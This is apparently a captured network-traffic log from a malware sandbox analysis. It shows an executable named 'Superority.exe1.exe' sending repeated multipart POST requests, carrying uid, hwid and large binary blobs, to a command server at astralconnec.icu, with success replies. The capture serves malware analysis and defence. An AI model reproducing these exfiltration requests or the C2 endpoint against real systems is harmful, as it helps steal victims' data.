2025-03-10 14:31:11 UTC	1369	IN	Data Raw: a5 9e 55 48 54 94 61 54 39 e3 c8 de b7 25 cb af c5 8b 90 39 c9 52 d0 d2 15 6a 21 6e 93 5a 56 ed 29 d2 f7 fd 02 33 4c 19 78 59 82 b4 7b a9 08 a6 3a fa 6e c8 58 1d 4c 77 82 46 64 e5 f8 11 a2 1f 8c a7 86 1f b1 ec c2 33 89 ca 70 1b 43 04 bf e8 f5 63 82 8b fd 75 ec 1d 17 4f 7d a2 77 23 9e cd 5a 4e 11 8d eb 8d 2a 86 2b c6 d4 96 1b a8 47 74 84 ea 8c 60 4c 74 85 0f bf 73 fe b8 f3 a7 01 d2 5b 28 8d 3b c5 fc 25 2d ff 4a 17 13 3f b0 18 45 b2 fb 55 94 a3 e4 34 80 a2 57 15 3e 69 9e ba 1b 1f 2c 34 3b 94 a9 42 22 a6 a4 0c 28 a8 c7 c5 87 e2 20 7a 85 34 07 c4 3e 3f 36 56 08 3a a4 29 8f 4c d0 a8 0a 4a 0f 07 bd 11 68 dc 48 33 0d 43 7a df 52 ce 83 1d 68 37 b7 f1 ad 15 bd d3 96 43 88 a9 91 fd 18 5b 9e 96 6f d1 81 16 4f 74 4b 9d f7 08 77 3c aa 56 fd 10 e7 c6 23 9b 8d 47 77 8c Data Ascii: UHTaT9%9Rj!nZV)3LxY{:nXLwFd3pCcuO}w#ZN*+Gt`Lts[(;%-J?EU4W>i,4;B"( z4>?6V:)LJhH3CzRh7C[oOtKw<V#Gw
2025-03-10 14:31:11 UTC	1369	IN	Data Raw: e5 0c bb 03 22 19 bb a7 f1 dd ea a7 8c be 61 07 be 90 52 f8 e7 72 11 a1 9b b3 1d 4c a6 24 3f 01 bf 1c 4a d8 42 4e f1 1f f6 ae fb 29 a2 22 62 c2 fd ae 33 03 b6 63 ce 8f 39 03 fc 42 ac c5 30 c8 aa 15 d3 be fe bb f1 59 8d 45 54 cb fe ba 75 28 8f 53 dc 54 64 99 9c 95 2e 6f 6c 6f df 88 2d 7d 52 e2 d8 56 4b 03 6b 3e c5 7c 6a 6d bf 2b 75 57 ef ab 82 ea 2c 55 be c1 00 27 56 24 39 06 73 70 ed 32 b2 1d 22 9d b0 4b 30 af f1 03 cf 75 c1 73 13 9d 43 c1 67 13 0b 81 75 00 98 ca 35 e6 3d 2b 11 cd 22 92 c3 a1 63 58 c4 58 83 ab ec 09 73 1c 1a d7 75 b2 98 e0 36 a8 80 65 65 23 f0 c3 99 f1 b0 87 c2 fc 94 a6 e6 7e 64 bc c9 66 f2 1c 36 45 0b e1 e7 ff 96 1a 34 03 fd f5 2d 26 d7 ec 7e 5b 88 a3 db 6e fd a4 c0 ae 51 f2 85 0b d8 9a af ac 29 2e d2 a4 93 94 16 32 a0 59 92 ec 97 36 8c Data Ascii: "aRrL$?JBN)"b3c9B0YETu(STd.olo-}RVKk>\|jm+uW,U'V$9sp2"K0usCgu5=+"cXXsu6ee#~df6E4-&~[nQ).2Y6
2025-03-10 14:31:11 UTC	1369	IN	Data Raw: ca 29 55 b9 e3 d5 f0 5e e3 d3 8d cf f0 74 56 c7 07 eb 9c ae 72 d3 94 b7 aa 5c 8e 47 df 96 84 83 9c 4a d2 d4 50 80 d7 38 ac a9 b9 2f ed 69 bc c4 3f 0b b6 b9 b9 11 00 26 07 6c ce 4b 26 76 95 dc 4d aa ae 69 e8 9d 0c ca 4f fa af d5 1f 92 80 a1 59 97 7e da 01 49 d8 a5 b2 c1 97 41 4a 7d 80 b5 e7 05 08 c9 a0 fa a0 34 1f 26 44 df 48 c4 c5 1d 31 36 90 59 4e 43 4e cd 1c aa ba ff c8 bf 1e 01 aa 22 77 e5 25 e3 36 c8 48 8a dd 4a 5f 08 4e 0a d5 95 ea 4b 14 87 03 53 05 4d ef 67 a6 ad 8d ac a5 ac 0d ca 2b ff 09 79 59 7b ed 8f 5b 0f 1a 4e d4 b4 37 27 fd 6b fd 7a 36 1b 40 b8 ea a0 25 7a d7 99 cf 00 b6 2a 79 1e 08 ca 01 2a 46 8e f2 b2 24 cf a0 cd fd fb 44 cd 20 4a 5b 86 c7 a2 bc 8e 1e 78 81 04 ee 48 0e fe 0d ce 1d 2e d8 14 b6 6b 36 52 b8 52 c5 55 4f f3 5c 92 eb 73 b0 ca d7 Data Ascii: )U^tVr\GJP8/i?&lK&vMiOY~IAJ}4&DH16YNCN"w%6HJ_NKSMg+yY{[N7'kz6@%zyF$D J[xH.k6RRUO\s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49690	104.21.77.86	443	5988	C:\Users\user\Desktop\Superority.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:31:14 UTC	282	OUT	POST /DPowko HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6B7LeHdwdaUtAJz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14507 Host: astralconnec.icu
2025-03-10 14:31:14 UTC	14507	OUT	Data Raw: 2d 2d 36 42 37 4c 65 48 64 77 64 61 55 74 41 4a 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 36 39 33 39 34 63 33 31 31 37 65 36 62 34 31 30 36 62 63 35 37 33 31 32 34 62 65 62 31 34 31 32 35 63 61 39 66 66 62 33 34 36 62 30 33 61 63 66 38 37 35 31 63 38 63 0d 0a 2d 2d 36 42 37 4c 65 48 64 77 64 61 55 74 41 4a 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 42 37 4c 65 48 64 77 64 61 55 74 41 4a 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a Data Ascii: --6B7LeHdwdaUtAJzContent-Disposition: form-data; name="uid"e69394c3117e6b4106bc573124beb14125ca9ffb346b03acf8751c8c--6B7LeHdwdaUtAJzContent-Disposition: form-data; name="pid"2--6B7LeHdwdaUtAJzContent-Disposition: form-data; name="hwid"
2025-03-10 14:31:35 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 14:31:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1%2FEVbKIWEr7uRuYpkEomn8UUsWuXRpeQNA55%2FHOe9xTxLuIDyUrSZpWxJ7hu0nw%2FQyUoPt6WY4K69io3MhR9jSJ9QhL%2FF9RnHkMs2cG7lF8ezw0QLMVvdfjUAls0pjJhcUf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e383bb0d020dea-MEM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=29680&min_rtt=24065&rtt_var=10704&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15447&delivery_rate=84886&cwnd=251&unsent_bytes=0&cid=a20b09a696ebaab8&ts=21001&x=0"
2025-03-10 14:31:35 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 32 30 33 2e 32 33 31 2e 31 39 36 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 73.203.231.196"}}
2025-03-10 14:31:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49696	104.21.77.86	443	5988	C:\Users\user\Desktop\Superority.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:31:37 UTC	276	OUT	POST /DPowko HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=jaXU535mv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15039 Host: astralconnec.icu
2025-03-10 14:31:37 UTC	15039	OUT	Data Raw: 2d 2d 6a 61 58 55 35 33 35 6d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 36 39 33 39 34 63 33 31 31 37 65 36 62 34 31 30 36 62 63 35 37 33 31 32 34 62 65 62 31 34 31 32 35 63 61 39 66 66 62 33 34 36 62 30 33 61 63 66 38 37 35 31 63 38 63 0d 0a 2d 2d 6a 61 58 55 35 33 35 6d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 6a 61 58 55 35 33 35 6d 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 38 38 43 41 39 43 41 36 41 42 36 33 41 43 Data Ascii: --jaXU535mvContent-Disposition: form-data; name="uid"e69394c3117e6b4106bc573124beb14125ca9ffb346b03acf8751c8c--jaXU535mvContent-Disposition: form-data; name="pid"2--jaXU535mvContent-Disposition: form-data; name="hwid"C288CA9CA6AB63AC
2025-03-10 14:31:38 UTC	820	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 14:31:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=giWMMheQ8drUYYE4NnkSB5A6UkiY3riqyevcgkXpPAQwT2IgkAxTH%2BGzXslS3li6A%2Bz5gTI%2F1K%2B49JQaKlShzJx0xg6RkNkFtY2q0Aw%2FX8reCzoFzhBLKCHE9zJ8U1AOBibv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e3844bdb943be1-MEM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=30806&min_rtt=24104&rtt_var=11121&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15973&delivery_rate=100790&cwnd=251&unsent_bytes=0&cid=0780f584543af51b&ts=1070&x=0"
2025-03-10 14:31:38 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 32 30 33 2e 32 33 31 2e 31 39 36 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 73.203.231.196"}}
2025-03-10 14:31:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49697	104.21.77.86	443	5988	C:\Users\user\Desktop\Superority.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:31:40 UTC	285	OUT	POST /DPowko HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SJ6zerX1C2H2Ztbd81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20409 Host: astralconnec.icu
2025-03-10 14:31:40 UTC	15331	OUT	Data Raw: 2d 2d 53 4a 36 7a 65 72 58 31 43 32 48 32 5a 74 62 64 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 36 39 33 39 34 63 33 31 31 37 65 36 62 34 31 30 36 62 63 35 37 33 31 32 34 62 65 62 31 34 31 32 35 63 61 39 66 66 62 33 34 36 62 30 33 61 63 66 38 37 35 31 63 38 63 0d 0a 2d 2d 53 4a 36 7a 65 72 58 31 43 32 48 32 5a 74 62 64 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 4a 36 7a 65 72 58 31 43 32 48 32 5a 74 62 64 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 Data Ascii: --SJ6zerX1C2H2Ztbd81Content-Disposition: form-data; name="uid"e69394c3117e6b4106bc573124beb14125ca9ffb346b03acf8751c8c--SJ6zerX1C2H2Ztbd81Content-Disposition: form-data; name="pid"3--SJ6zerX1C2H2Ztbd81Content-Disposition: form-data; name
2025-03-10 14:31:40 UTC	5078	OUT	Data Raw: 75 e4 bb e0 22 b0 4f d1 3f 6b f1 31 a9 3b d9 36 ef a7 1c e5 73 02 64 8b c4 0d c5 20 c6 e9 24 fd a9 3e d4 ca c4 99 61 28 5c 56 fc 8e f3 c0 91 d5 00 25 63 95 71 17 33 ba 96 56 cb ea b7 de be 1f e5 a3 72 4f 78 89 4c b9 65 b9 0e 77 71 72 2c 55 c8 d3 64 27 ca 08 99 39 21 ea c0 cc eb be 12 9d e2 63 cd df a6 84 13 05 48 30 36 20 12 80 30 1c c0 6b 96 06 e6 bf 87 6d 3e da 7b df a7 87 a5 93 c0 f9 ec 85 52 30 fc 48 b1 29 c0 4c a0 4c 92 b9 61 12 be 76 ed 20 f7 60 ef ca cd 63 d4 33 dd bc 37 9d 99 ab 27 84 bf ca c8 9e cb 59 90 f3 68 6a 48 33 95 41 13 9d 15 79 d4 43 26 b7 90 d9 fd 56 40 91 5f 61 52 36 35 e2 7c 69 0c 1e dd 33 69 6a fd 2b 0f 7e 75 06 ff 1f 0d 43 97 35 7b 4a f9 1d fa 08 f2 a4 73 98 03 78 2f 4a 98 95 cc 48 4e bf 20 5b 50 b0 82 90 8f 84 d6 49 70 22 f5 07 18 Data Ascii: u"O?k1;6sd $>a(\V%cq3VrOxLewqr,Ud'9!cH06 0km>{R0H)LLav `c37'YhjH3AyC&V@_aR65\|i3ij+~uC5{Jsx/JHN [PIp"
2025-03-10 14:31:41 UTC	816	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 14:31:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wEoooCFIdlEOYTewvVv8PJTLeyw2j69zvyOJsCzlOOC%2FZduJZUl%2BROZSSiky5MIWR%2FoatJj4Lp30122dm5R5Bi8N3TX2xMS4ASZkgJ6ZT8GxQ1omcelgnIBozZuB%2BNCCbx4W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e3845f8dc23be7-MEM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27195&min_rtt=23716&rtt_var=9331&sent=14&recv=22&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21374&delivery_rate=93410&cwnd=249&unsent_bytes=0&cid=22c9d1e8e300912c&ts=1231&x=0"
2025-03-10 14:31:41 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 32 30 33 2e 32 33 31 2e 31 39 36 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 73.203.231.196"}}
2025-03-10 14:31:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49699	104.21.77.86	443	5988	C:\Users\user\Desktop\Superority.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:31:44 UTC	274	OUT	POST /DPowko HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=twxx1gZ6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2601 Host: astralconnec.icu
2025-03-10 14:31:44 UTC	2601	OUT	Data Raw: 2d 2d 74 77 78 78 31 67 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 36 39 33 39 34 63 33 31 31 37 65 36 62 34 31 30 36 62 63 35 37 33 31 32 34 62 65 62 31 34 31 32 35 63 61 39 66 66 62 33 34 36 62 30 33 61 63 66 38 37 35 31 63 38 63 0d 0a 2d 2d 74 77 78 78 31 67 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 74 77 78 78 31 67 5a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 38 38 43 41 39 43 41 36 41 42 36 33 41 43 33 33 44 Data Ascii: --twxx1gZ6Content-Disposition: form-data; name="uid"e69394c3117e6b4106bc573124beb14125ca9ffb346b03acf8751c8c--twxx1gZ6Content-Disposition: form-data; name="pid"1--twxx1gZ6Content-Disposition: form-data; name="hwid"C288CA9CA6AB63AC33D
2025-03-10 14:31:45 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 14:31:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3epIhsasM1E%2FuRHiJIeuXvbsVKnF99TiPazG9tOPdK%2BAhx7tjF3AD6xPwZdm28d8VVbvMBHOnkmoB2epSPxvezgwrhuzdWwZatvkF5dpvyW8L%2FVK9ooFL9VRikducLg5rWNM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e38475eab50dea-MEM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=33398&min_rtt=27981&rtt_var=12731&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2840&recv_bytes=3511&delivery_rate=103472&cwnd=251&unsent_bytes=0&cid=065dceb6fff074a6&ts=1135&x=0"
2025-03-10 14:31:45 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 32 30 33 2e 32 33 31 2e 31 39 36 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 73.203.231.196"}}
2025-03-10 14:31:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49700	104.21.77.86	443	5988	C:\Users\user\Desktop\Superority.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:31:47 UTC	277	OUT	POST /DPowko HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=cMc1oHWI7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 552289 Host: astralconnec.icu
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: 2d 2d 63 4d 63 31 6f 48 57 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 36 39 33 39 34 63 33 31 31 37 65 36 62 34 31 30 36 62 63 35 37 33 31 32 34 62 65 62 31 34 31 32 35 63 61 39 66 66 62 33 34 36 62 30 33 61 63 66 38 37 35 31 63 38 63 0d 0a 2d 2d 63 4d 63 31 6f 48 57 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 63 4d 63 31 6f 48 57 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 38 38 43 41 39 43 41 36 41 42 36 33 41 43 Data Ascii: --cMc1oHWI7Content-Disposition: form-data; name="uid"e69394c3117e6b4106bc573124beb14125ca9ffb346b03acf8751c8c--cMc1oHWI7Content-Disposition: form-data; name="pid"1--cMc1oHWI7Content-Disposition: form-data; name="hwid"C288CA9CA6AB63AC
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: 33 cb 5e 2f 14 e9 7e 91 e9 89 51 2b 39 9c e3 50 0d 15 91 9b 86 5b 31 f9 65 1f 48 76 b8 85 06 13 fc 66 bb 19 bc 6a 06 7a 07 a3 27 39 c7 a9 c8 79 05 55 18 cb 73 63 33 e2 56 6d da 7f ad 77 af c8 49 0f a5 47 25 d7 85 0b 85 52 d3 a8 3c a5 52 23 10 c2 4d 85 fe f3 f8 e3 8e d2 29 e3 d6 84 32 a7 bd 49 31 2a d9 c7 96 5d 61 ff c0 e1 10 8f 68 37 64 3e ff 12 8b b5 7b 77 1c 1e da 88 66 11 27 46 c2 92 f6 25 3a 11 67 ca 74 d1 06 7c 95 10 58 4a 0b d2 cb db 66 ad 4e 8d 7f c3 72 d6 f2 9f 80 eb 80 f2 c3 77 a5 ea e0 13 6b 24 7e 30 bc b1 b7 d9 27 09 1b 96 d7 76 a7 2b ed a4 ec 99 8b 1b 08 0d f5 1e a4 2d a3 1c f5 e9 4e af 5a 81 5a 71 bb 23 28 9f 06 f7 b9 1e 68 7c 7d 4b 32 e7 07 9c 72 16 75 2e 47 2c 07 dd 54 2e 71 97 f0 5b ea 05 ef 80 6b 69 28 9c 6d 7e 24 dd 60 ee 0e 15 0a 22 b7 Data Ascii: 3^/~Q+9P[1eHvfjz'9yUsc3VmwIG%R<R#M)2I1*]ah7d>{wf'F%:gt\|XJfNrwk$~0'v+-NZZq#(h\|}K2ru.G,T.q[ki(m~$`"
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: 73 39 87 53 f1 34 d8 1c d1 70 a7 11 46 f3 bc 5a 9a 3a b0 a4 1b 71 d5 60 7a b4 e9 95 b6 e6 ff e3 7b 6e 17 59 29 1e 3b 80 f8 d6 3a 37 f0 c9 7b 98 d8 93 2a 87 89 2d 4d 47 ed b0 72 2d 80 c6 c2 22 bb 64 a9 19 b9 50 4f f6 3c 17 0a ae 70 a9 e8 44 cd bd d3 4d 8e 00 bf 62 d3 79 cb 8e 13 60 99 86 69 10 9f 82 1d 98 fc 83 b6 68 91 ce 99 98 f8 50 9e 50 c8 fb b0 a2 a5 6b 8d d5 0d e3 ac bc 1a 22 ff 1d c0 5d d7 e5 5f b4 1b af ab 6f 7c 66 07 dd 35 df a6 21 5d 08 b2 cc 7b be 1f de 79 03 28 c9 50 40 0e 2c ab 9c d3 ff d7 34 0a 0b 8d db c3 10 16 04 6f 70 b3 f9 1d 31 1b 08 8a a2 b6 b9 ce de d8 66 22 88 d7 2b ba b8 61 88 96 3d 1a 8e c5 47 b9 15 b4 da ed 4d ab 09 53 13 c3 1c 92 f2 47 58 1a de 73 76 fe 5a 87 c5 01 c8 ae 03 6f 7f 5b 87 a9 e1 13 4d dc 2f 47 2a 4c 0b 6f b6 20 83 c8 Data Ascii: s9S4pFZ:q`z{nY);:7{-MGr-"dPO<pDMby`ihPPk"]_o\|f5!]{y(P@,4op1f"+a=GMSGXsvZo[M/GLo
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: c6 fd 6c bd 18 fc 3b 80 b8 41 d1 de ca 35 08 61 ca 55 56 eb 1f 2a 07 53 0d a8 a5 b0 8c ec 99 e4 57 c9 65 6d b5 80 3f b7 be 10 34 2a 90 cf c5 a7 c3 59 28 b1 aa 36 69 c4 db 8f db 23 74 e9 14 89 15 09 81 6a ab 7f a5 4b 44 15 85 4c 57 68 ef 4d 5a 99 71 fb a7 16 2a 8a 0d 76 8d ee 55 5c 95 78 8d 2c 9c b4 cf e3 7e a8 c3 71 bb 50 cc 39 41 bf 44 d7 f7 20 9c 10 4e 49 7e 48 72 f6 15 27 d1 39 40 2b f9 7e 3d 50 35 e7 6d de 27 fc 2b a6 f4 88 fe 62 0d 67 9d da a0 ea 80 9c 9b 14 7d 15 44 80 cc ca 88 6a 66 fb 2a 31 64 d1 67 78 54 66 42 9e 99 8a 7c bc 40 55 a6 98 db 95 81 88 70 a9 b8 a8 a4 80 c6 7d f3 2b 39 62 39 80 89 89 78 f2 ec 20 4d 0a 88 b2 e2 9d b4 68 f1 e6 4d 2a df de 2a 95 f2 8a 2e 4b d6 57 23 a7 bb 13 2a 7c 88 5b 79 3d b9 44 c2 e9 9f 7b 42 60 0b 80 e2 5e 48 4f d9 Data Ascii: l;A5aUVSWem?4Y(6i#tjKDLWhMZqvU\x,~qP9AD NI~Hr'9@+~=P5m'+bg}Djf1dgxTfB\|@Up}+9b9x MhM*.KW#\|[y=D{B`^HO
2025-03-10 14:31:47 UTC	15331	OUT	Data Raw: 1b 70 d8 69 79 7c 6c 89 d9 8c b5 38 52 84 73 0b a7 f6 00 b3 7d 55 b1 ea 9a 56 56 70 c2 d3 14 1a 73 e7 3d 63 99 9c d3 a5 a0 e6 75 96 d9 6e 12 42 5c bc 51 47 f8 16 65 49 5d 3d f6 fa 71 71 26 d2 b3 1e e0 0a ba 50 64 a6 1e 05 f3 61 ff 1a fb 47 bb d4 cc cb ff 4f 01 a1 68 b2 09 c8 6a 30 30 74 5b 59 3d a7 be e9 94 b6 7b 94 ed 7f 62 bd 07 74 9a 9a b6 5c 0f 22 64 d6 1c 4b 5f 6c 33 35 8e fa ff 9f b8 8b 6b e1 3d ce d0 50 4c 79 9f ff 2f f1 35 57 48 9c 75 a8 63 4e 1e 6f 11 46 cb d4 c8 3e c1 46 28 46 6d 26 e5 e2 93 e3 dc b2 0b 8a ac d3 83 db 01 91 97 fc 77 a7 33 32 f5 d3 2d d8 a9 96 88 f0 89 d3 bf cb 75 bf 87 0d 10 b4 e4 02 2f 66 6e be 0f 6f 0d a4 09 57 ef 38 1c 47 3f 5a 9e 22 2f 60 bf 98 ef 58 4b d1 d0 69 89 ff 29 5e 4c 6e 95 ba 66 36 53 b6 ef a6 9b ec d8 a4 f0 b4 a6 Data Ascii: piy\|l8Rs}UVVps=cunB\QGeI]=qq&PdaGOhj00t[Y={bt\"dK_l35k=PLy/5WHucNoF>F(Fm&w32-u/fnoW8G?Z"/`XKi)^Lnf6S
